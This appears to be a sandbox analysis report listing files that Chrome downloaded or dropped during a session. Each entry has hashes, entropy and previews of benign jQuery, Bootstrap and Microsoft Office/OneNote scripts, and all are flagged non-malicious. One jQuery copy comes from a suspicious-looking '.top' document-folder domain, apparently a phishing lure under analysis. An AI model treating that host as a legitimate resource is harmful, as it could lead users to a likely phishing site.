                                                                                      Preview:function WacCurve(n,t,i,r,u,f){this.ID=n;this.type=t;this.x1=i;this.y1=r;this.x2=u;this.y2=f}function WacIntWrapper(n,t){this.value=n;this.contextId=t}function WacKeyFrame(n,t,i,r,u,f,e,o){this.type=n;this.curveID=t;this.startTime=i==null||i.value==undefined?new WacIntWrapper(i,null):i;this.endTime=r==null||r.value==undefined?new WacIntWrapper(r,null):r;this.startValue=u==null||u.value==undefined?new WacIntWrapper(u,null):u;this.endValue=f==null||f.value==undefined?new WacIntWrapper(f,null):f;this.relativeTo=e;this.operationType=o}function WacAnimation_ContextVariableManager(){}function WacAnim(n,t){this.ID=n;this.keyFrames=t}function WacAnimationEngine(){this.AnimationQueue=new Array(0);this.sharedTimer=null;this.sharedCancelTimer=null;this.resetInterval=5e3;this.sharedTimerRefs=0;this.conflictTable=new Array(0);this.currentAnimationIndex=-1;this.temporaryIDGenerator=0}function WacAnimation_State(){this.Index=0;this.Data=new Array(0);this.AnimateRight=!1}function WacAnimation_Object(n
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (32065)
                                                                                      Category:downloaded
                                                                                      Size (bytes):85578
                                                                                      Entropy (8bit):5.366055229017455
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:2F6B11A7E914718E0290410E85366FE9
                                                                                      SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                                                      SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                                                      SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://mohrhydrokultur.adaradocumentfolder.top/js___/671a3964cb679-18422c97909c69491844ce8ab555f730
                                                                                      Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (35936), with CRLF line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):65468
                                                                                      Entropy (8bit):5.346696281904265
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:1997228D20EACA8AA1C9D666E58CBCDB
                                                                                      SHA1:B7FAD772EDC427D672F2911D5FCC4AF5151606BF
                                                                                      SHA-256:B873715A8705C515974A714B92EF7AD138EA308D972E407DEFD77F2078DB2BA5
                                                                                      SHA-512:B43B8A01294D0540F59408BFF29B62E4EFEC041776AC45A21E58369847695A8447FA896ED772EAD07CB5D4E43DA64E79254F57F94C6AFB5274A6123CE6772528
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://appsforoffice.microsoft.com/lib/1.1/hosted/office.js
                                                                                      Preview:var OSFPerformance;..(function (OSFPerformance) {.. OSFPerformance.officeExecuteStartDate = 0;.. OSFPerformance.officeExecuteStart = 0;.. OSFPerformance.officeExecuteEnd = 0;.. OSFPerformance.hostInitializationStart = 0;.. OSFPerformance.hostInitializationEnd = 0;.. OSFPerformance.totalJSHeapSize = 0;.. OSFPerformance.usedJSHeapSize = 0;.. OSFPerformance.jsHeapSizeLimit = 0;.. OSFPerformance.getAppContextStart = 0;.. OSFPerformance.getAppContextEnd = 0;.. OSFPerformance.createOMEnd = 0;.. OSFPerformance.officeOnReady = 0;.. OSFPerformance.hostSpecificFileName = "";.. function now() {.. if (performance && performance.now) {.. return performance.now();.. }.. else {.. return 0;.. }.. }.. OSFPerformance.now = now;.. function getTotalJSHeapSize() {.. if (typeof (performance) !== 'undefined' && performance.memory) {.. return performance.memory.totalJSHeapSize;.. }..
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65340), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):728648
                                                                                      Entropy (8bit):5.4092815192781245
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:F7E1D4D211A0B61997EA97964BD14E5A
                                                                                      SHA1:2145B0FD252CD3AB2225ED0AF171C179B8CD6099
                                                                                      SHA-256:B8FDD85B0B87E9C2971C6DF817D1023D9E489A821F1F3B7293876B4CD0A82FF6
                                                                                      SHA-512:1AF3E71D9B1CEA51B85038785410BBD3B9989EB2228A387BF1E252B15E8E5E4A502BDA7A953ACCAEE110A46F6C5E6F277163117B4E68755934FFC74D1EF4E23C
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:function asyncGeneratorStep(e,t,o,n,r,i,a){try{var s=e[i](a),l=s.value}catch(e){return void o(e)}s.done?t(l):Promise.resolve(l).then(n,r)}function _async_to_generator(e){return function(){var t=this,o=arguments;return new Promise((function(n,r){var i=e.apply(t,o);function a(e){asyncGeneratorStep(i,n,r,a,s,"next",e)}function s(e){asyncGeneratorStep(i,n,r,a,s,"throw",e)}a(void 0)}))}}function _define_property(e,t,o){return t in e?Object.defineProperty(e,t,{value:o,enumerable:!0,configurable:!0,writable:!0}):e[t]=o,e}function _object_spread(e){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},n=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(n=n.concat(Object.getOwnPropertySymbols(o).filter((function(e){return Object.getOwnPropertyDescriptor(o,e).enumerable})))),n.forEach((function(t){_define_property(e,t,o[t])}))}return e}function ownKeys(e,t){var o=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.fi
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:XML 1.0 document, ASCII text
                                                                                      Category:downloaded
                                                                                      Size (bytes):2743
                                                                                      Entropy (8bit):5.138744724685597
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:03FD32F2E28EBDE4EC38156C83EEEE10
                                                                                      SHA1:518410F8BC555BC44E361CD50A4F20366896A36E
                                                                                      SHA-256:3CB6C640746A34590CC7FAA34E0FF24804AA947927DCAB6E50CDE0902033E421
                                                                                      SHA-512:ADD9342EAA18BDE5C66DA20C28A78B03A30E4DA311F56DFF3F3EF197727697E164E6CF82EDBBA9518D2CBDF706C7016857D9004B654D7F112A641B09BFDEF6A5
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://fa000000128.resources.office.net/033f92d3-bc6d-439a-858a-a17acf70360a/1.0.2410.12006/en-us_web/manifest_web.xml
                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>.<OfficeApp xmlns="http://schemas.microsoft.com/office/appforoffice/1.1" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:bt="http://schemas.microsoft.com/office/officeappbasictypes/1.0" xmlns:ov="http://schemas.microsoft.com/office/taskpaneappversionoverrides" xsi:type="TaskPaneApp">. <Id>8ef9aa39-de6e-4fb7-841a-f0f08546d398</Id>. <Version>1.0.0.0</Version>. <ProviderName>Microsoft Office Services</ProviderName>. <DefaultLocale>en-US</DefaultLocale>. <DisplayName DefaultValue="Copilot"/>. <Description DefaultValue="Copilot"/>. <IconUrl DefaultValue=""/>. <HighResolutionIconUrl DefaultValue=""/>. <AppDomains>. <AppDomain>https://fa000000128.resources.office.net</AppDomain>. <AppDomain>https://res.cdn.office.net</AppDomain>. <AppDomain>https://res.sdf.cdn.office.net</AppDomain>. <AppDomain>https://res-h3.sdf.cdn.office.net</AppDomain>. <AppDomain>https://res-h3.public.cdn.office.net</AppDomain>.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):3795
                                                                                      Entropy (8bit):4.3844101364272134
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:5C0933030B9469EFE64356E6E9B81B9C
                                                                                      SHA1:28714D05D594D123E8723911C32E689AA1360D19
                                                                                      SHA-256:DE55687574CFE646B7157274119BAE759FE34C5ED75468C3E2BEA4798FC73324
                                                                                      SHA-512:2B9566B455E4114296EDD08D73E7F35F534547F3FAD891F33DC5A59D0F6083F843ACDBC87D6C9F8F3F3759F51C750F0AC13FF8E631265A1FCA4E98B08447946E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:{"timestamp":1729771825170,"BootstrapperUlsHeartBeatIsEnabled":false,"EnableCommonHostDiagnosticsParams":true,"ShouldLogJsApiKpisForWord":true,"EnableFramePageErrorReportingForWord":false,"EnableWordSessionRefreshTelemetry":false,"EnableWordSessionRefreshLoggingCleanup":false,"BootstrapperSettingsFetchPeriod":60000,"BootstrapperUlsHeartbeatIntervalMs":5000,"BootstrapperMaxUlsHeartbeatTime":600000,"BootstrapperNoCompleteWarning1Time":120000,"BootstrapperNoCompleteWarning2Time":180000,"BootstrapperUlsUploadCadenceMs":60000,"WordRefreshTelemetryExpirationInDays":7,"RequestedCallThrottlingDefaultToViewMinimumValue":"Major","RemoteUlsETag":"C78C301AFEA9348D5ECE9A0B93BE4D1DAB74B6B1","RemoteUlsSuppressions":"378069,1671813,2208151,2209344,3249545,3290144,4273285,4285850,4298965,4298968,4298969,4751696,5018275,5306497,5904476,6375195,6572226,6948167,7463498,8194017,8458642,17044289,17085210,17085216,17162522,17358857,17387682,19214611,19243470,19707039,19743902,19939648,20486158,21627712,21631
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):2808
                                                                                      Entropy (8bit):5.160810588598458
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:C2EE1D789CF6FC61AEB0B76399FB0E64
                                                                                      SHA1:E55F7A87DD76AECBEDFB84347F07A75F283D58C6
                                                                                      SHA-256:AFACB4EBFE0700B8192FDBC3B0F1D776C4B3C73E1B192F955C47C870DDD73989
                                                                                      SHA-512:ED8B8A4CAFF3C6D479BE412D24A2B02DDA6C52B8AF562426CE6EC8D21B6223DB7EB53BE005687F3EA4441296E13C6D28B983C7FEDBEDD566C3F915E69700E200
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://fa000000012.resources.office.net/033f92d3-bc6d-439a-858a-a17acf70360a/1.0.2409.20006/en-us_web/manifest_web.xml
                                                                                      Preview:<?xml version="1.0" encoding="UTF-8"?>..<OfficeApp xmlns="http://schemas.microsoft.com/office/appforoffice/1.1" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:bt="http://schemas.microsoft.com/office/officeappbasictypes/1.0" xmlns:ov="http://schemas.microsoft.com/office/taskpaneappversionoverrides" xsi:type="TaskPaneApp">.. <Id>93155735-fd84-4d6f-9433-305bdb6cb523</Id>.. <Version>1.0.0.0</Version>.. <ProviderName>Microsoft Corporation</ProviderName>.. <DefaultLocale>en-US</DefaultLocale>.. <DisplayName DefaultValue="Help" />.. <Description DefaultValue="In-App Help provided by support.office.com" />.. <IconUrl DefaultValue="https://support.office.com/images/inapp-help-icon-32.png" />.. <HighResolutionIconUrl DefaultValue="https://support.office.com/images/inapp-help-icon-80.png" />.. <SupportUrl DefaultValue="http://support.office.com" />.. <AppDomains>.. <AppDomain>https://login.live.com</AppDomain>.. <AppDomain>https://login.live-int.com</AppDomain>.. <
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (3527), with no line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):3527
                                                                                      Entropy (8bit):5.243451451019216
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:DF2E618F66E5DE074A8070BC09CA3C4F
                                                                                      SHA1:38F67C978761E4AEAA5341A4FF39C59C1DED221C
                                                                                      SHA-256:BD0DD2B15855BE52CBA496CC6E8F0FF65FBBA6ADDBA92282E53CECA6B27BFCC9
                                                                                      SHA-512:6CCA2001607B8DBA825F30116A7CD0FC93A0A32E01931DA86AD4820F883CB1AD25823D61443321525550E0EEDD17E0A018A1B13F6E802050593DE19E721F450B
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://cdn.onenote.net/officeaddins/161821840453_Scripts/Instrumentation.js
                                                                                      Preview:function GetInstrumentationCategory(){return instrumentationCategory?instrumentationCategory:InstrumentationCategoryString?instrumentationCategory=Diag.ULSCat[InstrumentationCategoryString]:null}function InstrumentLinks(n){for(var t,r=0,i=0;i<n.length;i++)t=n[i],t.id||(t.id="un_"+r,r++),t.onclick=GenerateInstrumentationLink(t.id,t.onclick),t.ondragstart=GenerateDragInstrumentationLink(t.id,t.ondrag),t.oncontextmenu=GenerateContextMenuInstrumentationLink(t.id,t.oncontextmenu)}function LogUserViewPortInfo(){var t=$(window).width(),n=$(window).height(),i=screen.width,r=screen.height,u=$(document).height(),f=n/u*100;Diag.ULS.sendTraceTag(6436628,GetInstrumentationCategory(),Diag.ULSTraceLevel.info,"User ViewPort Info;windowWidth={0};windowHeight={1};screenWidth={2};screenHeight={3};percentageOfPageVisible={4};",t,n,i,r,f.toFixed(3))}function UpdateFurthestScrollDepth(){var t=$(window).scrollTop(),i=$(window).height(),r=t+i,u=$(document).height(),n=r/u*100;n>furthestScrollDepthPercentage&&(
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (627)
                                                                                      Category:dropped
                                                                                      Size (bytes):4036925
                                                                                      Entropy (8bit):5.656272828875875
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:1C61FE06C85D5FFC9CF7D5B86223536C
                                                                                      SHA1:344E99D68E02BB0FA288771EC17854808296FB4F
                                                                                      SHA-256:F2D4A670C00B7D9D0A78E95BF95FDA4F5C70B9972450E08A75E1BB021E580C91
                                                                                      SHA-512:254A9DFA95B956EE14B79DD0ECD561EFC1A800C6E0070119C478A58870C9404893BE99C3F48780E5B06A1D0C0481315C100DE0C9B3557D15E206A1F7F6A05581
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:/*. Microsoft Corporation. All rights reserved.. The buffer module from node.js, for the browser... @author Feross Aboukhadijeh <https://feross.org>. @license MIT. ieee754. BSD-3-Clause License. Feross Aboukhadijeh <https://feross.org/opensource> Copyright (c) Microsoft Corporation and contributors. All rights reserved.. Licensed under the MIT License..*/.'use strict';(function(){function ya(C){var L=H[C];if(void 0!==L)return L.exports;L=H[C]={exports:{}};Sa[C].call(L.exports,L,L.exports,ya);return L.exports}var Sa={15057:function(C,L,d){function k(P,W){return P.toLowerCase().localeCompare(W.toLowerCase())}function h(P){if(!P)return[];let W="";try{w(P).forEach(ea=>{W+=String.fromCharCode(ea)})}catch(ea){W=l(P)}return W.split("\r\n").filter(ea=>ea)}function l(P){try{if(!/^[a-z0-9+/]+={0,2}$/i.test(P)||0!==P.length%4)throw Error("Not base64 string");.let W,ea,da,ba,ua,la,ha,ia;const Y=[];for(let fa=0;fa<P.length;fa+=4)ba="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2
                                                                                      Entropy (8bit):1.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:E0AA021E21DDDBD6D8CECEC71E9CF564
                                                                                      SHA1:9CE3BD4224C8C1780DB56B4125ECF3F24BF748B7
                                                                                      SHA-256:565339BC4D33D72817B583024112EB7F5CDF3E5EEF0252D6EC1B9C9A94E12BB3
                                                                                      SHA-512:900110C951560EFF857B440E89CC29F529416E0E3B3D7F0AD51651BFDBD8025B91768C5ED7DB5352D1A5523354CE06CED2C42047E33A3E958A1BBA5F742DB874
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:OK
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65530), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):668160
                                                                                      Entropy (8bit):5.5355372812426
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:2C09ECEDCC26D01D2BF6EB26E7B00702
                                                                                      SHA1:CDC426462849F616786AD8ACD1BD9EA3E474248F
                                                                                      SHA-256:41D3F17294A627E15FFA2323AB0F58925D2353255C532BCBAE87E9090E604D01
                                                                                      SHA-512:36722CB26451515AB809C55F6E164C52D9B845BC467FAE5C216324CFD11749A6AC278C5D0C3770CF46FA71FC32D5BCF9BAA2A06A597FB1CCCEA6B7ADC54A495D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:function asyncGeneratorStep(e,t,o,n,r,i,a){try{var s=e[i](a),l=s.value}catch(e){return void o(e)}s.done?t(l):Promise.resolve(l).then(n,r)}function _async_to_generator(e){return function(){var t=this,o=arguments;return new Promise((function(n,r){var i=e.apply(t,o);function a(e){asyncGeneratorStep(i,n,r,a,s,"next",e)}function s(e){asyncGeneratorStep(i,n,r,a,s,"throw",e)}a(void 0)}))}}function _define_property(e,t,o){return t in e?Object.defineProperty(e,t,{value:o,enumerable:!0,configurable:!0,writable:!0}):e[t]=o,e}function _object_spread(e){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},n=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(n=n.concat(Object.getOwnPropertySymbols(o).filter((function(e){return Object.getOwnPropertyDescriptor(o,e).enumerable})))),n.forEach((function(t){_define_property(e,t,o[t])}))}return e}function ownKeys(e,t){var o=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.fi
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (64817)
                                                                                      Category:downloaded
                                                                                      Size (bytes):756202
                                                                                      Entropy (8bit):5.272960395761771
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:D3CD36D061148A303F8E1DFC47F6B2CB
                                                                                      SHA1:DADE1F0E4A9E31351C121442A7AFEBDE21787D45
                                                                                      SHA-256:1473F3E79F0EF7F34E3E5AABC1B4209D16F40124F35AECBA6BB26B91372C43C5
                                                                                      SHA-512:04999F982BF1434B51493ECC3A4BFFFBB498BAEBB8E3F650B9C673AB10686E73451CF26E0479878D49A375B047D129AEA5153B404AC4E1D66A2615BD42EC3EBD
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://c1-onenote-15.cdn.office.net/o/s/161821441004_App_Scripts/osfruntime_ono.js
                                                                                      Preview:/* Office runtime JavaScript library */../*..Copyright (c) Microsoft Corporation. All rights reserved..*/.../*. Your use of this file is governed by the Microsoft Services Agreement http://go.microsoft.com/fwlink/?LinkId=266419... This file also contains the following Promise implementation (with a few small modifications):. * @overview es6-promise - a tiny implementation of Promises/A+.. * @copyright Copyright (c) 2014 Yehuda Katz, Tom Dale, Stefan Penner and contributors (Conversion to ES6 API by Jake Archibald). * @license Licensed under MIT license. * See https://raw.githubusercontent.com/jakearchibald/es6-promise/master/LICENSE. * @version 2.3.0.*/.var __extends=this&&this.__extends||function(){var e=function(t,n){return e=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var n in t)Object.prototype.hasOwnProperty.call(t,n)&&(e[n]=t[n])},e(t,n)};return function(t,n){if("fu
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (50758)
                                                                                      Category:dropped
                                                                                      Size (bytes):51039
                                                                                      Entropy (8bit):5.247253437401007
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:67176C242E1BDC20603C878DEE836DF3
                                                                                      SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                                                                      SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                                                                      SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (1922), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1922
                                                                                      Entropy (8bit):5.006174566262526
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:3E3CD75B07B521BC61C01450E2C7873A
                                                                                      SHA1:57D7881E0E878CABE74B1021CF86126148928DE7
                                                                                      SHA-256:2882BF4B22D0AD63E6F8877EB5C22353921E8C87B197911462933B7D1A7A44B8
                                                                                      SHA-512:3B1D53CB1F49B2CF8648CEF8EDEB526B924430F2FC622421DF6AB3F61E49449CD5EB8BCCC7E6A019575A4843B0D3C50A69C4B0BF1D1133F960E92969CAC37BE7
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:function InitializeUls(){TheUlsHost=new Diag.ConsoleUlsHost;Diag.ULS.setUlsHost(TheUlsHost)}function FlushBrowserUls(){TheUlsHost&&TheUlsHost.dispose();InitializeUls()}var __extends=this.__extends||function(n,t){function r(){this.constructor=n}for(var i in t)t.hasOwnProperty(i)&&(n[i]=t[i]);r.prototype=t.prototype;n.prototype=new r},Diag,TheUlsHost;(function(n){var t=function(){function n(){}return n.prototype.isEnabled=function(){var n=!1;try{typeof Storage!="undefined"&&(n=localStorage.getItem("EnableConsoleLogging")==="true")}catch(t){}return n&&window.console&&window.console.log},n.prototype.error=function(n){window.console.error(n)},n.prototype.warning=function(n){window.console.warn(n)},n.prototype.info=function(n){window.console.info(n)},n.prototype.log=function(n){window.console.log(n)},n}(),i=function(i){function r(r,u){r===void 0&&(r=new t);i.call(this,SessionId,BrowserUlsUploadPath,new n.UlsUploadConfiguration(null,null,null,null,null,null,!0));this._console=r;this._suppress
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:JSON data
                                                                                      Category:downloaded
                                                                                      Size (bytes):109
                                                                                      Entropy (8bit):4.66560738606782
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:B22CAC36842DCB642F5BFF86C0FF2FB9
                                                                                      SHA1:7F0557D5258453F55C1DB5DD40AB7F1C31932655
                                                                                      SHA-256:E25ABD11267B28557444D53A9A3BF52A796DF20A14205FDE0B19C6B8287976B3
                                                                                      SHA-512:D991A7C2B5552EF795F01450BEB8FE91785FAB87DD53361AD4048972BADB46180966120B0EF42B647654DE6CB8E8DF6D13EFDC2C170CB498FD8DBAC63629ADAC
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://messaging.engagement.office.com/campaignmetadataaggregator?country=US&locale=en-US&app=2158&platform=Web&version=16.0.18214.41004&campaignParams=pageWidth%3D1280%26pageHeight%3D907%26screenWidth%3D1280%26screenHeight%3D1024%26colorDepth%3D24%26more%3Dtrue%26OFC_Audience%3DProduction%26Datacenter%3DPUS11%26TenantId%3D9188040d-6c67-4c5b-b112-36a304b66dad%26SelfTriggerActivity%3D%26&contentType=CampaignContent%3BDynamicSettings&puid=&OFC_FLIGHTS=&ageGroup=0&sessionUserType=2
                                                                                      Preview:{"CampaignContent":{"campaigns":[]},"DynamicSettings":{"TmsLoadTimeout":3000,"TeachingMessageCooldown":3600}}
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):2309
                                                                                      Entropy (8bit):5.313671109612457
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:50184382895464D3782CF48A1D676CBE
                                                                                      SHA1:54F93E2BB549E843B9C6BB6994C38CE0938BD071
                                                                                      SHA-256:38D4AD4AADD096DA25EA5A3BFDB1C8CB156A51EBF18CC9CD72CA4B15EE795C90
                                                                                      SHA-512:AC6B44C4F937FACC705A0EE41B03D50E881551336B3B9ECCF9378B36D0B28290E945AAEBF157179C26F05C250813F2C88AD44BA3BCDF0CA2F2ADA02FEED76D59
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://www.onenote.com/officeaddins/learningtools/?et=
                                                                                      Preview:......<!DOCTYPE html>..<html lang="en-US">..<head>...<meta charset="utf-8">...<title></title>......<script type="text/javascript" src="https://cdn.onenote.net/officeaddins/161821840453_Scripts/CommonDiagnostics.js" crossorigin="anonymous"></script>...<script type="text/javascript" src="https://cdn.onenote.net/officeaddins/161821840453_Scripts/BrowserUls.js" crossorigin="anonymous"></script>.......<script>.....var EnableClientSideLogging = true;....</script>......<script type="text/javascript" src="https://ajax.aspnetcdn.com/ajax/jQuery/jquery-3.5.0.min.js"></script>...<script type="text/javascript" src="https://cdn.onenote.net/officeaddins/161821840453_Scripts/ExternalResources/js-cookie.js" crossorigin="anonymous"></script>...<script type="text/javascript" src="https://cdn.onenote.net/officeaddins/161821840453_Scripts/pickadate.min.js" crossorigin="anonymous"></script>...<script type="text/javascript" src="https://cdn.onenote.net/officeaddins/161821840453_Scripts/Instrumentation.js" c
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (61584), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):127321
                                                                                      Entropy (8bit):3.8975903207588436
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:95AA78CD619069BCDE235DEDC3AF5F41
                                                                                      SHA1:6CD1FB538E2AEF2D14C5D88E905C72713DE7A8D4
                                                                                      SHA-256:3994D1ABCC40B2E17CF88747F45CB06238F0458DFC1EF57196BBC44065A69C6D
                                                                                      SHA-512:3D855672A1AFD84F86482A3C5892FCBCD9837F10AA153F6C6A0C63328C3D8FB364B170D2934D8BF0AF4AA81A624C40D131BBC1AE0DA1213A82153C2D8A1A9806
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:var CoefficientModelIdMap= {104:'AlignCenter',156:'NT3',17:'faPrint',130:'flyoutOneNoteEdit',6:'HideAllNavCommand',24:'IncreaseIndent',129:'InsertSymbol',91:'NT14',36:'AutomaticFontColor',147:'PictureAbsoluteWidth',46:'ImmersiveReader',111:'Copy',33:'Numbering',134:'floatiefseaIndent',53:'NT1',3:'NT0',88:'btnImmersiveMode',155:'NT15',51:'floatiefontName',65:'Strikethrough',137:'ThemeFontColorPickerMCU',15:'GetHelpFromTellMe',31:'Spelling',127:'EnterMathMode',42:'InsertOnlinePicture',154:'NT10',37:'SetProofingLanguage',56:'ToggleRibbonUXDialog',160:'floatiefsbcUnderline',96:'ToggleBorders',40:'AutoCorrectOptions',119:'SelectTable',177:'InsertEmoji',107:'Paste',62:'FontSize',79:'ToggleAuthorInfoVisibility',82:'MoreEmojis',110:'ClearStyleFormatting',52:'floatiefontSize',86:'btnOpenInClient',112:'ShowSectionsAndPagesCommand',165:'ChangePageColor',32:'Italic',152:'AlignRight',116:'btnEditOnWeb',98:'InsertTable',87:'NT13',140:'InkThicknessDropDownOpen',123:'floatiefseaOutdent',168:'InsertLef
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (58392)
                                                                                      Category:downloaded
                                                                                      Size (bytes):58441
                                                                                      Entropy (8bit):5.65377007639572
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:64CF57DDEFEE6B6909C89A150D729583
